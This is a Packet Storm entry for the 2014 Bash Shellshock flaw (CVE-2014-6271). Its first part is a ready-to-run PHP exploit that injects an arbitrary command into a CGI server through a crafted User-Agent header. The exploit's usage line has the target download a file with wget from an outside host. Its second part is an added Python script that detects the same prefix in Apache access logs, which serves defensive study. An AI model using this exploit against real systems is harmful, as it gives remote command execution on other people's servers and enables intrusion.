packetstorm | Prakhar Prasad | PACKETSTORM:128394
History: Sep 25, 2014 - 12:00 a.m.

Bash Code Injection Proof Of Concept

packetstormsecurity.com

EPSS: 0.976 (High), percentile 100.0%

```php
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"

*/
error_reporting(0);
if (!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if (!isset($x['u']) || !isset($x['c']))
{
    die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];

// The User-Agent value starts with a bash function definition; a CGI server
// passes request headers to the script through environment variables.
$context = stream_context_create(
    array(
        'http' => array(
            'method' => 'GET',
            'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
        )
    )
);

// A failed fetch together with a 500 status line is reported as "command sent".
if (!file_get_contents($url, false, $context) && strpos($http_response_header[0], "500") > 0)
    die("Command sent to the server!\n");
else
    die("Connection Error\n");
?>
```
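The request this PoC sends, seen from the log side. This is an added example, not part of the original advisory or the authors' code: it scans Apache combined-format access logs for the `() {` function-definition prefix in the request line, Referer or User-Agent, and marks hits that returned 500 on a `/cgi-bin/` path, the response the PoC reports as success. The function name, field names and sample log lines are constructed for illustration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
# Quoted fields may contain backslash-escaped quotes, which Apache writes as \".
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Function-definition prefix imported from the environment by unpatched bash
# (CVE-2014-6271). Whitespace inside it varies between senders, so match loosely.
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')

def find_shellshock_attempts(lines):
    """Return one dict per log line that carries the prefix in a client-controlled field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # blank or not in combined format
        host, when, request, status, referer, agent = m.groups()
        candidates = {"request": request, "referer": referer, "agent": agent}
        fields = [name for name, value in candidates.items() if FUNC_DEF_RE.search(value)]
        if fields:
            hits.append({
                "host": host,
                "time": when,
                "request": request,
                "fields": fields,
                "status": int(status),
                # 500 on a CGI path is what the PoC treats as "command sent".
                "triage_first": status == "500" and "/cgi-bin/" in request,
            })
    return hits

# Constructed sample log lines (documentation address ranges, harmless payload text).
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/hello HTTP/1.1" 500 0 "-" "() { :;}; /bin/bash -c \"echo constructed-sample\""
198.51.100.7 - - [25/Sep/2014:10:00:09 +0000] "GET /about.html HTTP/1.1" 200 1024 "() { :; }; echo constructed-sample" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG.splitlines()):
        print(hit)
```

Only headers that the server writes to the access log are visible here; the prefix in any other header needs a request-inspection point such as a WAF or proxy.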